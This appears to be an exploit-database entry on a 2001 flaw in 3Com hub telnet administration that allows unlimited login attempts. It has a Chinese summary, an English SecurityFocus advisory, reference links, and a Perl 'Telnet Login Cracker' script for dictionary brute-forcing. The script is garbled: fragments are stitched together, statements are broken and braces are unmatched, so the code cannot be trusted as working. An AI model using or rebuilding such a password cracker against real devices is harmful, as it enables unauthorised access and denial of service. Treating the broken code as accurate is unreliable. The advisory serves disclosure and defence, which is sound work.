https://www.exploit-db.com/exploits/21011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-081

3Com硬件例如PS40SuperStackII中的远程登录服务器不延迟或拆开提供不正确的用户名或密码的远程攻击者，远程攻击者借助强力密码猜测更容易打入服务器。

source: http://www.securityfocus.com/bid/3034/info

A vulnerability exists in certain models of 3Com hubs and potentially other 3Com network products.

The affected devices fail to properly restrict the allowed number of login attempts to the inbuilt telnet-based administration interface from remote users. Attackers can use brute-force cracking techniques in obtaining access to 3Com telnetd config accounts.

Exploiting this, a malicious user can interfere with the device's operation and configuration, creating denials of service and further compromising the network on which the device is installed. 

#!/usr/bin/perl -w

#######################esponsible for any damgae caused  #
# by the###########################################
rf, chr(13), chr(10);

recv(SOCK,$ol,1,0);
$passwd,0); 
   }
   recv(SOCK,$ol,1,0);
 $i++
}
$i=1;
}
print "nnIt's sad but true, you failed.n";
}


print "n3Com Hardware Telnet Login Cracker, written by Siberian - Sentry Research Labsnn";
print "Get the latest Version at www.sentry-labs.comnn [target host] [dictionary] (username)";
$us= inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iesspass();

close(FILE1);
close(SOCK);
exit 0;

来源:XF
名称:3com-telnetd-brute-force(6855)
链接:http://xforce.iss.net/static/6855.php
来源:BID
名称:3034
链接:http://www.securityfocus.com/bid/3034
来源:BUGTRAQ
名称:200107123ComTelnetD
链接:http://www.securityfocus.com/archive/1/196957